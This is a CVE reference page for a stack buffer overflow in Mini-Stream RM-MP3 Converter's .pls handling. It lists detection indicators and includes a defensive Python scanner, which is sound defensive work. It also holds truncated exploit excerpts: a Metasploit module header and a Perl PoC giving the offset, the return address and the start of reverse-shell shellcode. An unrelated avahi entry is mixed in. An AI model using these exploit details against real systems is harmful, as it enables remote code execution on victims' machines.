CVE-2010-5081
Published 2011-12-25
Priority: P3 · 53 · critical · 9.3 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit available
EPSS: 31.37% (98.1th percentile)
Stack-based buffer overflow in Mini-Stream RM-MP3 Converter 3.1.2.1 allows remote attackers to execute arbitrary code via a long URL in a .pls file.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mini-stream | rm-mp3_converter | — | — |
Detection & IOCs (extracted from sources)
Bytes: \xCF\xDA\x05\x10
Bytes: \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff
- Malicious .pls file contains a URL field starting with 'http://' followed by ~17417+ bytes of junk, triggering a stack buffer overflow in Mini-Stream RM-MP3 Converter 3.1.2.1
- Look for abnormally large URL entries (>17000 bytes) inside .pls playlist files as an indicator of an exploitation attempt
- ROP/return address 0x100371f5 (call ESP) in MSRMfilter03.dll at offset 17417 within the .pls URL field is the exploit pivot point; monitor for this value in memory or file content
- Alternative RET address 0x1005DACF (\xCF\xDA\x05\x10, jump to ESP from msrmfilter03.dll) used in the universal PoC; scan .pls files for this byte sequence
- Payload uses the AlphanumUpper encoder with ECX as BufferRegister; encoded shellcode in the .pls URL will be entirely uppercase alphanumeric, so look for long runs of uppercase ASCII bytes after the RET address
- PrependEncoder stub bytes EB 03 59 EB 05 E8 F8 FF FF FF appear immediately before the alphanumeric shellcode in Metasploit-generated payloads for this exploit
- Bad characters for this exploit are \x00, \x09, \x0a (null, tab, newline); absence of these bytes in an otherwise long URL within a .pls file is consistent with crafted exploit content
- Two different RET addresses are used across PoCs for the same DLL (MSRMfilter03.dll): 0x100371f5 (Metasploit module) vs 0x1005DACF (universal PoC by Madjix). Detection rules should cover both.
- The Metasploit module uses offset 17417 while the universal PoC uses 17425 bytes of junk before the RET address; both target the same vulnerability but differ slightly in buffer layout.
- The exploit is classified as local/fileformat (the victim must open a crafted .pls file); there is no network-based delivery vector inherent to the vulnerability itself.
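As an added detection example (written for this page, not taken from any of the sources listed), the following Python scanner applies the indicators above to .pls content: oversized FileN= entries, either RET address in little-endian form, the PrependEncoder stub, and an uppercase alphanumeric run after the RET. The two sample playlists and the 200-byte run threshold are constructed assumptions.

```python
"""Scan .pls playlist content for the CVE-2010-5081 indicators listed above."""
import re

# Indicators from the page: oversized URL entries, the two RET addresses used by
# the PoCs (stored little-endian, as they would appear in the file), and the
# PrependEncoder stub that precedes Metasploit's alphanumeric shellcode.
MAX_URL_LEN = 17000
RET_ADDRESSES = {
    "0x100371f5": b"\xf5\x71\x03\x10",  # call ESP, Metasploit module
    "0x1005DACF": b"\xCF\xDA\x05\x10",  # jmp ESP, universal PoC
}
PREPEND_STUB = b"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff"
# Assumed threshold: 200+ consecutive uppercase alphanumerics after a RET address
# is treated as an AlphanumUpper-encoded payload.
UPPER_RUN = re.compile(rb"[A-Z0-9]{200,}")
FILE_ENTRY = re.compile(rb"^File(\d+)=(.*)$", re.MULTILINE)


def scan_pls(data: bytes) -> list:
    """Return [(entry_number, [reasons])] for every suspicious FileN= entry."""
    findings = []
    for m in FILE_ENTRY.finditer(data):
        entry, url = int(m.group(1)), m.group(2).rstrip(b"\r")
        reasons = []
        if len(url) > MAX_URL_LEN:
            reasons.append(f"URL length {len(url)} exceeds {MAX_URL_LEN}")
        for label, ret in RET_ADDRESSES.items():
            pos = url.find(ret)
            if pos != -1:
                reasons.append(f"RET address {label} present")
                if UPPER_RUN.search(url, pos + len(ret)):
                    reasons.append("uppercase alphanumeric run after RET")
        if PREPEND_STUB in url:
            reasons.append("PrependEncoder stub present")
        if reasons:
            findings.append((entry, reasons))
    return findings


# Constructed samples (not real captures): a normal playlist and one laid out
# like the universal PoC, with b"K" * 300 standing in for the encoded payload.
BENIGN_PLS = b"[playlist]\r\nFile1=http://example.com/song.mp3\r\nTitle1=Song\r\nNumberOfEntries=1\r\n"
SUSPICIOUS_PLS = (
    b"[playlist]\r\nFile1=http://" + b"A" * 17425 + RET_ADDRESSES["0x1005DACF"]
    + PREPEND_STUB + b"K" * 300 + b"\r\nNumberOfEntries=1\r\n"
)

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_PLS), ("suspicious", SUSPICIOUS_PLS)):
        print(name, scan_pls(sample))
```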
CVSS provenance
- NVD (CVSS 2.0): 9.3 CRITICAL, AV:N/AC:M/Au:N/C:C/I:C/A:C
- Red Hat (vendor): 5.0 MEDIUM
GHSA
GHSA-8w3p-v3w3-837j (unreviewed, 2022-05-17): CVE-2010-5081 [HIGH] CWE-119, Stack-based buffer overflow in Mini-Stream RM-MP3 Converter 3
Red Hat
CVE-2010-2244 [MEDIUM] avahi: assertion failure after receiving a packet with corrupted checksum (vendor_redhat, 2010-06-23, CVSS 5.0)
The AvahiDnsPacket function in avahi-core/socket.c in avahi-daemon in Avahi 0.6.16 and 0.6.25 allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a DNS packet with an invalid checksum followed by a DNS packet with a valid checksum, a different vulnerability than CVE-2008-5081.
Package: avahi (Red Hat Enterprise Linux 6) - Not affected
No detection rules found.
Exploit-DB
Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Local Stack Buffer Overflow (Metasploit) (exploitdb, 2011-11-14, CVE-2010-5081)
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Mini-Stream RM-MP3 Converter v3.1.2.1 (PLS File) Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack based buffer overflow found in Mini-Stream RM-MP3
        Converter v3.1.2.1. The overflow is triggered when an unsuspecting victim
        opens the malicious PLS file.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Madjix',          # original discovery
          'Tiago Henriques', # metasploit module
          'James Fitts'      # clean
```
(The listing is truncated at this point in the source.)
Exploit-DB
Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Local Stack Buffer Overflow Universal (exploitdb, 2010-07-16, CVE-2010-5081)
```perl
# Mini-Stream RM-MP3 Converter v3.1.2.1 (.pls) Stack Buffer Overflow universal
# By Madjix (you don't have the email, what would you do with it anyway)
# Sec4ever.com
my $junk    = "http://" . "\x41" x 17425;
my $ret     = "\xCF\xDA\x05\x10";   # jump to ESP - from msrmfilter03.dll
my $padding = "\x90" x 24;
# windows/shell_reverse_tcp - 739 bytes
# http://www.metasploit.com
my $shellcode =
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41
```
(The listing is truncated at this point in the source.)
Metasploit
Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow (metasploit)
This module exploits a stack based buffer overflow found in Mini-Stream RM-MP3 Converter v3.1.2.1. The overflow is triggered when an unsuspecting victim opens the malicious PLS file.
Published 2011-12-25